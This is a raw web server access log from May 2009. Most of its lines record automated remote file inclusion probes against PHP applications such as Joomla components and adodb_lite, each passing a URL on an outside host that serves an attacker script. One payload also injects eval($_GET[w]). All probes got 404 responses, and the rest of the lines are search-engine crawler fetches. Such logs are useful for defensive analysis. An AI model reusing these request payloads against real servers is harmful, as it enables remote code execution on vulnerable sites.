218.249.36.194 - - [13/May/2009:00:20:48 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.249.36.194 - - [13/May/2009:00:20:48 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.249.36.194 - - [13/May/2009:00:20:49 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.94.24.125 - - [13/May/2009:00:21:14 -0500] "GET /twindow_notice.php?shop_this_skin_pathhttp://www.project80s.com/id.gif??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.94.24.125 - - [13/May/2009:00:21:14 -0500] "GET /logs/access_log.1231977600/twindow_notice.php?shop_this_skin_pathhttp://www.project80s.com/id.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.94.24.125 - - [13/May/2009:00:21:18 -0500] "GET /logs/twindow_notice.php?shop_this_skin_pathhttp://www.project80s.com/id.gif??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
66.249.67.180 - - [13/May/2009:00:22:18 -0500] "GET /logs/access_log.1122508800 HTTP/1.1" 200 272 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [13/May/2009:00:27:17 -0500] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:00:27:17 -0500] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
122.153.212.195 - - [13/May/2009:00:27:25 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:00:27:35 -0500] "GET /logs/access_log.1176249600 HTTP/1.1" 200 646 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [13/May/2009:00:27:36 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:27:36 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:29:45 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:29:51 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:29:51 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.94.24.125 - - [13/May/2009:00:31:00 -0500] "GET /logs/access_log.1237680000/twindow_notice.php?shop_this_skin_pathhttp://www.project80s.com/id.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
66.249.67.180 - - [13/May/2009:00:32:51 -0500] "GET /logs/access_log.1198713600 HTTP/1.1" 200 1330 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.18.58 - - [13/May/2009:00:37:19 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:00:37:19 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:00:37:19 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:00:37:24 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:00:37:24 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:00:37:24 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:00:37:25 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:00:37:30 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:00:38:08 -0500] "GET /logs/access_log.1205625600 HTTP/1.1" 200 2796 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [13/May/2009:00:38:55 -0500] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:38:55 -0500] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:00:39:03 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:00:39:03 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.16.54 - - [13/May/2009:00:39:34 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.826"
218.38.16.54 - - [13/May/2009:00:39:35 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.826"
67.227.156.113 - - [13/May/2009:00:39:38 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 369 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:00:39:38 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:00:39:38 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.227.156.113 - - [13/May/2009:00:39:49 -0500] "GET /logs/access_log.1236384000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 369 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
121.165.73.157 - - [13/May/2009:00:40:31 -0500] "GET /logs/access_log.1236643200//bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:00:40:32 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:00:40:32 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:00:40:32 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:00:40:33 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:00:40:33 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:00:40:33 -0500] "GET /logs/access_log.1236643200//bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:00:40:34 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:00:41:32 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:00:41:32 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
148.243.72.112 - - [13/May/2009:00:41:35 -0500] "GET /logs/errors.php?error=http://www.readingastro.org.uk/graphics/moon/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
148.243.72.112 - - [13/May/2009:00:41:35 -0500] "GET /errors.php?error=http://www.readingastro.org.uk/graphics/moon/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
69.172.126.16 - - [13/May/2009:00:43:09 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
69.172.126.16 - - [13/May/2009:00:43:10 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:00:43:27 -0500] "GET /logs/access_log.1208476800 HTTP/1.1" 200 3364 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [13/May/2009:00:45:30 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:45:30 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
88.191.103.144 - - [13/May/2009:00:45:40 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:00:45:40 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.825"
87.106.135.14 - - [13/May/2009:00:46:01 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:00:46:02 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
218.185.20.88 - - [13/May/2009:00:46:23 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:46:23 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:46:23 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.117.191.71 - - [13/May/2009:00:47:02 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:00:47:02 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
87.106.135.14 - - [13/May/2009:00:48:09 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:00:48:09 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:00:48:43 -0500] "GET /logs/access_log.1176076800 HTTP/1.1" 200 268 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [13/May/2009:00:49:24 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:00:49:24 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
217.18.76.16 - - [13/May/2009:00:49:47 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:49:47 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
88.191.103.144 - - [13/May/2009:00:49:51 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:00:49:52 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.825"
82.159.191.105 - - [13/May/2009:00:50:45 -0500] "GET /logs/access_log.1240012800//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.37.188.74 - - [13/May/2009:00:51:34 -0500] "GET /logs/errors.php?error=http://www.readingastro.org.uk/graphics/moon/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
200.37.188.74 - - [13/May/2009:00:51:35 -0500] "GET /errors.php?error=http://www.readingastro.org.uk/graphics/moon/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
209.172.33.230 - - [13/May/2009:00:51:59 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
209.172.33.230 - - [13/May/2009:00:51:59 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.172.33.230 - - [13/May/2009:00:51:59 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
209.172.33.230 - - [13/May/2009:00:51:59 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:52:07 -0500] "GET //include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:52:07 -0500] "GET /logs//include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:52:07 -0500] "GET /logs/access_log.1236643200//include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:53:43 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:53:43 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:53:43 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.172.126.16 - - [13/May/2009:00:53:45 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
69.172.126.16 - - [13/May/2009:00:53:46 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:00:54:00 -0500] "GET /logs/access_log.1132358400 HTTP/1.1" 200 2811 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.143 - - [13/May/2009:00:54:28 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:00:54:28 -0500] "GET /logs/access_log.1192233600 HTTP/1.1" 200 1409 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.119.158.133 - - [13/May/2009:00:55:24 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:55:24 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:55:24 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:56:09 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:56:09 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:56:09 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
202.75.4.169 - - [13/May/2009:00:56:13 -0500] "GET /logs/index.php?option=com_virtuemart&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [13/May/2009:00:56:14 -0500] "GET /index.php?option=com_virtuemart&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
65.55.208.143 - - [13/May/2009:00:56:23 -0500] "GET /logs/access_log.1163030400 HTTP/1.1" 200 1004 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:00:56:23 -0500] "GET /logs/access_log.1203897600 HTTP/1.1" 200 2549 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
123.143.98.5 - - [13/May/2009:00:57:45 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.172.126.16 - - [13/May/2009:00:59:17 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
69.172.126.16 - - [13/May/2009:00:59:17 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:00:59:17 -0500] "GET /logs/access_log.1174003200 HTTP/1.1" 200 3360 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.48.81 - - [13/May/2009:01:00:26 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:01:00:26 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:01:00:26 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:01:00:57 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:01:00:57 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:01:00:57 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
89.36.57.210 - - [13/May/2009:01:01:32 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://eopin.com/limesurvey/classes/core/Priv8/SB-iD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
89.36.57.210 - - [13/May/2009:01:01:32 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://eopin.com/limesurvey/classes/core/Priv8/SB-iD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
85.18.117.101 - - [13/May/2009:01:02:00 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:01:02:00 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:01:02:00 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.160.4.250 - - [13/May/2009:01:02:33 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
